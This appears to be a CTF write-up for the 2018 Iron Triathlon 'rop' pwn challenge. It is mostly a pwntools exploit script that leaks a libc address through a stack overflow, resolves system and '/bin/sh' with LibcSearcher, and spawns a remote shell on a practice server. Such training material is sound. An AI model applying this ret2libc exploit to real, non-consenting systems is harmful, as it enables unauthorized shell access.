铁人三项(第五赛区)_2018_rop

经典ret2libc3

exp

from pwn import * 
from LibcSearcher import * 
context(os='linux', arch='i386', log_level='debug') 

#p = process('./pwn') 
p = remote('node4.buuoj.cn',28146)
elf = ELF('./pwn')
main_addr = elf.sym['main']
plt_addr  = elf.plt['write']	
got_addr  = elf.got['write']

pay1 = b'a'*(0x88+4)+p32(plt_addr)+p32(main_addr)+p32(1)+p32(got_addr)+p32(0xD)
p.sendline(pay1)

write_addr = u32(p.recv()[0:4])#0xf7db1190
print("write_addr = ",hex(write_addr))

libc=LibcSearcher('write',write_addr)
offset=write_addr-libc.dump('write')
binsh=offset+libc.dump('str_bin_sh')
system=offset+libc.dump('system')
print("libc_base_addr = ",hex(offset))
print("sys_addr = ",hex(system))
print("sh_addr = ",hex(binsh))
pay2 = b'a'*(0x88+4)+p32(system)+b'aaaa'+p32(binsh)
p.sendline(pay2)
p.interactive()